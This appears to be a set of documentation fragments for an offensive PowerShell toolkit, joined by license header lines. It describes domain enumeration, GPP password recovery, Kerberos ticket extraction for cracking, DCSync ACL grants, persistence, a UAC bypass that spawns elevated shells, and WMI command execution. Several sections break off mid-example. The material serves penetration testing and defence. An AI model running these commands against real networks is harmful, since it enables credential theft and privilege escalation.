 .
 ## DESCRIPTION
 This function enumerates all machines on the current (or specified) domain
 using Get-DomainComputer, and enumerates the available shares for each
 machine with Get-NetShare.
 It will then use Find-InterestingFile on each
 readhable share, searching for files marching specific criteria.
 If -Credential
 is passed, then Invoke-UserImpersonation is used to impersonate the specified
 user before enumeration, reverting after with Invoke-RevertToSelf.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-InterestingDomainShareFile
 ```
 .
 Finds 'interesting' files on the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')
 ```
 .
 Finds 'interesting' files on readable shares on the specified systems.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Recon/Add-RemoteConnection.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Add-RemoteConnection.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### ComputerName (Default)
 ```
 Add-RemoteConnection [-ComputerName] <String[]> -Credential <PSCredential>
 ```
 .
 ### Path
 ```
 Add-RemoteConnection [-Path] <String[]> -Credential <PSCredential>
 ```
 .
 ## DESCRIPTION
 This function uses WNetAddConnection2W to make a 'temporary' (i.e.
 not saved) connection
 to the specified remote -Path (\\\\UNC\share) with the alternate credentials specified in the
 -Credential object.
 If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.
 .
 To destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\share path
 or -ComputerName.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Persistence/New-UserPersistenceOption.md
Copyright: __NO_COPYRIGHT__ in: docs/Persistence/New-UserPersistenceOption.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### ScheduledTaskOnIdle
 ```
 New-UserPersistenceOption [-ScheduledTask] [-OnIdle]
 ```
 .
 ### ScheduledTaskHourly
 ```
 New-UserPersistenceOption [-ScheduledTask] [-Hourly]
 ```
 .
 ### ScheduledTaskDaily
 ```
 New-UserPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
 ```
 .
 ### Registry
 ```
 New-UserPersistenceOption [-Registry] [-AtLogon]
 ```
 .
 ## DESCRIPTION
 New-UserPersistenceOption allows for the configuration of elevated persistence options.
 The output of this function is a required parameter of Add-Persistence.
 Available persitence options in order of stealth are the following: scheduled task, registry.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Recon/Find-DomainObjectPropertyOutlier.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-DomainObjectPropertyOutlier.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### ClassName (Default)
 ```
 Find-DomainObjectPropertyOutlier [-ClassName] <String> [-ReferencePropertySet <String[]>] [-Domain <String>]
 [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ### ReferenceObject
 ```
 Find-DomainObjectPropertyOutlier [-ReferencePropertySet <String[]>] -ReferenceObject <PSObject>
 [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass.
 If a -ReferenceObject is passed, the class is extracted from the passed object.
 A 'reference' set of property names is then calculated, either from a standard set preserved
 for user/group/computers, or from the array of names passed to -ReferencePropertySet, or
 from the property names of the passed -ReferenceObject.
 These property names are substracted
 from the master schema propertyu name list to retrieve a set of 'non-standard' properties.
 Every user/group/computer object (depending on determined class) are enumerated, and for each
 object, if the object has a 'non-standard' property set, the object samAccountName, property
 name, and property value are output to the pipeline.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-DomainObjectPropertyOutlier -User
 ```
 .
 Enumerates users in the current domain with 'outlier' properties filled in.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-DomainObjectPropertyOutlier -Group -Domain external.local
 ```
 .
 Enumerates groups in the external.local forest/domain with 'outlier' properties filled in.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
 ```
 .
 Enumerates computers in the current domain with 'outlier' properties filled in.
 .
 ## PARAMETERS
 .
 ### -ClassName
 Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.
 If -ReferenceObject is specified, this will be automatically extracted, if possible.
 .
 ```yaml
 Type: String
 Parameter Sets: ClassName
 Aliases: Class
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ReferencePropertySet
 Specifies an array of property names to diff against the class schema.
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ReferenceObject
 Specicifes the PowerView user/group/computer object to extract property names
 from to use as the reference set.
 .
 ```yaml
 Type: PSObject
 Parameter Sets: ReferenceObject
 Aliases:
 .
 Required: True
 Position: Named
 Default value: None
 Accept pipeline input: True (ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -Domain
 Specifies the domain to use for the query, defaults to the current domain.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -LDAPFilter
 Specifies an LDAP query string that is used to filter Active Directory objects.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: Filter
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -SearchBase
 The LDAP source to search through, e.g.

Files:     docs/Recon/Get-HttpStatus.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-HttpStatus.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-HttpStatus [-Target] <String> [[-Path] <String>] [[-Port] <Int32>] [-UseSSL]
 ```
 .
 ## DESCRIPTION
 A script to check for the existence of a path or file on a webserver.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
 ```
 .
 ## PARAMETERS
 .
 ### -Target
 Specifies the remote web host either by IP or hostname.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Path
 Specifies the remost host.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 2
 Default value: .\Dictionaries\admin.txt
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Port
 Specifies the port to connect to.
 .
 ```yaml
 Type: Int32
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 3
 Default value: 0
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -UseSSL
 Use an SSL connection.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
 .
 ## RELATED LINKS
 .
 [http://obscuresecurity.blogspot.com
 http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]()

Files:     docs/Recon/Get-ForestTrust.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-ForestTrust.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ForestTrust [[-Forest] <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will enumerate domain trust relationships for the current (or a remote)
 forest using number of method using the .NET method GetAllTrustRelationships() on a
 System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ForestTrust
 ```
 .
 Return current forest trusts.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-ForestTrust -Forest "external.local"
 ```
 .
 Return trusts for the "external.local" forest.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Recon/Get-DomainGroupMember.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainGroupMember.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### None (Default)
 ```
 Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]
 [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]
 [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ### ManualRecurse
 ```
 Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-Recurse] [-LDAPFilter <String>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ### RecurseUsingMatchingRule
 ```
 Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-RecurseUsingMatchingRule]
 [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone]
 [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for the specified
 group matching the criteria.
 Each result is then rebound and the full user
 or group object is returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainGroupMember "Desktop Admins"
 ```
 .
 GroupDomain             : testlab.local
 GroupName               : Desktop Admins

Files:     docs/Recon/Invoke-UserImpersonation.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Invoke-UserImpersonation.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### Credential (Default)
 ```
 Invoke-UserImpersonation -Credential <PSCredential> [-Quiet]
 ```
 .
 ### TokenHandle
 ```
 Invoke-UserImpersonation -TokenHandle <IntPtr> [-Quiet]
 ```
 .
 ## DESCRIPTION

Files:     docs/Privesc/Get-CachedGPPPassword.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-CachedGPPPassword.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-CachedGPPPassword
 ```
 .
 ## DESCRIPTION
 Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and
 datasources.xml files and returns plaintext passwords.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-CachedGPPPassword
 ```
 .
 NewName   : \[BLANK\]
 Changed   : {2013-04-25 18:36:07}
 Passwords : {Super!!!Password}
 UserNames : {SuperSecretBackdoor}
 File      : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7
 C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr
 oups.xml
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 .
 ## RELATED LINKS
 .
 [http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
 https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
 https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
 http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
 http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
 https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
 https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
 http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
 http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html)

Files:     docs/Recon/Add-DomainObjectAcl.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Add-DomainObjectAcl.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Add-DomainObjectAcl [[-TargetIdentity] <String[]>] [-TargetDomain <String>] [-TargetLDAPFilter <String>]
 [-TargetSearchBase <String>] -PrincipalIdentity <String[]> [-PrincipalDomain <String>] [-Server <String>]
 [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
 [-Credential <PSCredential>] [-Rights <String>] [-RightsGUID <Guid>]
 ```
 .
 ## DESCRIPTION
 This function modifies the ACL/ACE entries for a given Active Directory
 target object specified by -TargetIdentity.
 Available -Rights are
 'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
 rights GUID can be set with -RightsGUID.
 These rights are granted on the target
 object for the specified -PrincipalIdentity.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Privesc/Invoke-PrivescAudit.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Invoke-PrivescAudit.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-PrivescAudit [-HTMLReport]
 ```
 .
 ## DESCRIPTION
 Executes all functions that check for various Windows privilege escalation opportunities.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Invoke-PrivescAudit
 ```
 .
 Runs all escalation checks and outputs a status report for discovered issues.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Invoke-PrivescAudit -HTMLReport
 ```
 .
 Runs all escalation checks and outputs a status report to SYSTEM.username.html
 detailing any discovered issues.
 .
 ## PARAMETERS
 .
 ### -HTMLReport
 Switch.
 Write a HTML version of the report to SYSTEM.username.html.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### System.String
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Recon/Get-DomainSPNTicket.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainSPNTicket.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### RawSPN (Default)
 ```
 Get-DomainSPNTicket [-SPN] <String[]> [-OutputFormat <String>] [-Credential <PSCredential>]
 ```
 .
 ### User
 ```
 Get-DomainSPNTicket [-User] <Object[]> [-OutputFormat <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will either take one/more SPN strings, or one/more PowerView.User objects
 (the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
 using System.IdentityModel.Tokens.KerberosRequestorSecurityToken.
 The encrypted
 portion of the ticket is then extracted and output in either crackable John or Hashcat
 format (deafult of John).
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
 ```
 .
 Request a kerberos service ticket for the specified SPN.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 "HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket
 ```
 .
 Request kerberos service tickets for all SPNs passed on the pipeline.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
 ```
 .
 Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.
 .
 ## PARAMETERS
 .
 ### -SPN
 Specifies the service principal name to request the ticket for.
 .
 ```yaml
 Type: String[]
 Parameter Sets: RawSPN
 Aliases: ServicePrincipalName
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -User
 Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
 .
 ```yaml
 Type: Object[]
 Parameter Sets: User
 Aliases:
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -OutputFormat
 Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
 Defaults to 'John'.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: Format
 .
 Required: False
 Position: Named
 Default value: John
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Credential
 A \[Management.Automation.PSCredential\] object of alternate credentials
 for connection to the remote domain using Invoke-UserImpersonation.
 .
 ```yaml
 Type: PSCredential
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: [Management.Automation.PSCredential]::Empty
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ### String
 .
 Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
 .
 ### PowerView.User
 .
 Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
 .
 ## OUTPUTS
 .
 ### PowerView.SPNTicket
 .
 Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Privesc/Invoke-WScriptUACBypass.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Invoke-WScriptUACBypass.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-WScriptUACBypass [-Command] <String> [-WindowStyle <String>]
 ```
 .
 ## DESCRIPTION
 Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute
 VBScript using the wscript executable with the new manifest.
 The VBScript executed by
 C:\Windows\wscript.exe will run elevated.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 "
 ```
 .
 Launches the specified PowerShell encoded command in high-integrity.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible'
 ```
 .
 Spawns a high integrity cmd.exe.
 .
 ## PARAMETERS
 .
 ### -Command
 The shell command you want wscript.exe to run elevated.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: CMD
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -WindowStyle
 Whether to display or hide the window for the executed '-Command X'.
 Accepted values are 'Hidden' and 'Normal'/'Visible.
 Default is 'Hidden'.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: Hidden
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 .
 ## RELATED LINKS
 .
 [http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
 https://github.com/Vozzie/uacscript
 https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
 https://github.com/Vozzie/uacscript
 https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1)

Files:     docs/Recon/Get-ForestDomain.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-ForestDomain.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ForestDomain [[-Forest] <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Returns all domains for the current forest or the forest specified
 by -Forest X.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ForestDomain
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-ForestDomain -Forest external.local
 ```
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Privesc/Find-ProcessDLLHijack.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Find-ProcessDLLHijack.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Find-ProcessDLLHijack [[-Name] <String[]>] [-ExcludeWindows] [-ExcludeProgramFiles] [-ExcludeOwned]
 ```
 .
 ## DESCRIPTION
 Enumerates all currently running processes with Get-Process (or accepts an
 input process object from Get-Process) and enumerates the loaded modules for each.
 All loaded module name exists outside of the process binary base path, as those
 are DLL load-order hijack candidates.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-ProcessDLLHijack
 ```
 .
 Finds possible hijackable DLL locations for all processes.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-Process VulnProcess | Find-ProcessDLLHijack
 ```
 .
 Finds possible hijackable DLL locations for the 'VulnProcess' processes.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles
 ```
 .
 Finds possible hijackable DLL locations not in C:\Windows\* and
 not in C:\Program Files\* or C:\Program Files (x86)\*
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```
 Find-ProcessDLLHijack -ExcludeOwned
 ```
 .
 Finds possible hijackable DLL location for processes not owned by the
 current user.
 .
 ## PARAMETERS
 .
 ### -Name
 The name of a process to enumerate for possible DLL path hijack opportunities.
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases: ProcessName
 .
 Required: False
 Position: 1
 Default value: $(Get-Process | Select-Object -Expand Name)
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -ExcludeWindows
 Exclude paths from C:\Windows\* instead of just C:\Windows\System32\*
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ExcludeProgramFiles
 Exclude paths from C:\Program Files\* and C:\Program Files (x86)\*
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ExcludeOwned
 Exclude processes the current user owns.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.HijackableDLL.Process
 .
 ## NOTES
 .
 ## RELATED LINKS
 .
 [https://www.mandiant.com/blog/malware-persistence-windows-registry/](https://www.mandiant.com/blog/malware-persistence-windows-registry/)

Files:     CodeExecution/Invoke-WmiCommand.ps1
Copyright: __NO_COPYRIGHT__ in: CodeExecution/Invoke-WmiCommand.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Invoke-WmiCommand executes a PowerShell ScriptBlock on a target
 computer using WMI as a pure C2 channel. It does this by using the
 StdRegProv WMI registry provider methods to store a payload into a
 registry value. The command is then executed on the victim system and
 the output is stored in another registry value that is then retrieved
 remotely.
 .
 .PARAMETER Payload
 .
 Specifies the payload to be executed on the remote system.
 .
 .PARAMETER RegistryKeyPath
 .
 Specifies the registry key where the payload and payload output will
 be stored.
 .
 .PARAMETER RegistryPayloadValueName
 .
 Specifies the registry value name where the payload will be stored.
 .
 .PARAMETER RegistryResultValueName
 .
 Specifies the registry value name where the payload output will be
 stored.
 .
 .PARAMETER ComputerName
 .
 Runs the command on the specified computers. The default is the local
 computer.
 .
 Type the NetBIOS name, an IP address, or a fully qualified domain
 name of one or more computers. To specify the local computer, type
 the computer name, a dot (.), or "localhost".
 .
 This parameter does not rely on Windows PowerShell remoting. You can
 use the ComputerName parameter even if your computer is not
 configured to run remote commands.
 .
 .PARAMETER Credential
 .
 Specifies a user account that has permission to perform this action.
 The default is the current user. Type a user name, such as "User01",
 "Domain01\User01", or User@Contoso.com. Or, enter a PSCredential
 object, such as an object that is returned by the Get-Credential
 cmdlet. When you type a user name, you will be prompted for a
 password.
 .
 .PARAMETER Impersonation
 .
 Specifies the impersonation level to use. Valid values are:
 .
 0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".)
 .
 1: Anonymous (Hides the credentials of the caller.)
 .
 2: Identify (Allows objects to query the credentials of the caller.)
 .
 3: Impersonate (Allows objects to use the credentials of the caller.)
 .
 4: Delegate (Allows objects to permit other objects to use the credentials of the caller.)
 .
 .PARAMETER Authentication
 .
 Specifies the authentication level to be used with the WMI connection. Valid values are:
 .
 -1: Unchanged
 .
 0: Default
 .
 1: None (No authentication in performed.)
 .
 2: Connect (Authentication is performed only when the client establishes a relationship with the application.)
 .
 3: Call (Authentication is performed only at the beginning of each call when the application receives the request.)
 .
 4: Packet (Authentication is performed on all the data that is received from the client.)
 .
 5: PacketIntegrity (All the data that is transferred between the client  and the application is authenticated and verified.)
 .
 6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.)
 .
 .PARAMETER EnableAllPrivileges
 .
 Enables all the privileges of the current user before the command
 makes the WMI call.
 .
 .PARAMETER Authority
 .
 Specifies the authority to use to authenticate the WMI connection.
 You can specify standard NTLM or Kerberos authentication. To use
 NTLM, set the authority setting to ntlmdomain:<DomainName>, where
 <DomainName> identifies a valid NTLM domain name. To use Kerberos,
 specify kerberos:<DomainName\ServerName>. You cannot include the
 authority setting when you connect to the local computer.
 .
 .EXAMPLE
 .
 PS C:\>Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1'
 .
 .EXAMPLE

Files:     docs/Recon/Get-DomainGroup.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainGroup.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainGroup [[-Identity] <String[]>] [-MemberIdentity <String>] [-AdminCount] [-Domain <String>]
 [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
 [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
 [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for all objects
 matching the criteria.
 To only return specific properies, use
 "-Properties samaccountname,usnchanged,...".
 By default, all group objects for
 the current domain are returned.
 To return the groups a specific user/group is
 a part of, use -MemberIdentity X to execute token groups enumeration.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainGroup | select samaccountname
 ```
 .
 samaccountname

Files:     docs/Recon/New-DomainGroup.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/New-DomainGroup.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 New-DomainGroup [-SamAccountName] <String> [[-Name] <String>] [[-DisplayName] <String>]
 [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]
 ```
 .
 ## DESCRIPTION
 First binds to the specified domain context using Get-PrincipalContext.
 The bound domain context is then used to create a new
 DirectoryServices.AccountManagement.GroupPrincipal with the specified
 group properties.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
 ```
 .
 Creates the 'TestGroup' group with the specified description.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     docs/Persistence/Get-SecurityPackage.md
Copyright: __NO_COPYRIGHT__ in: docs/Persistence/Get-SecurityPackage.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-SecurityPackage
 ```
 .
 ## DESCRIPTION
 Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
 It also parses the returned SecPkgInfo struct array.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-SecurityPackage
 ```
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### ComputerIdentity (Default)
 ```
 Get-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] <String> [-LocalGroup <String>] [-Domain <String>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ### OUIdentity
 ```
 Get-DomainGPOComputerLocalGroupMapping -OUIdentity <String> [-LocalGroup <String>] [-Domain <String>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
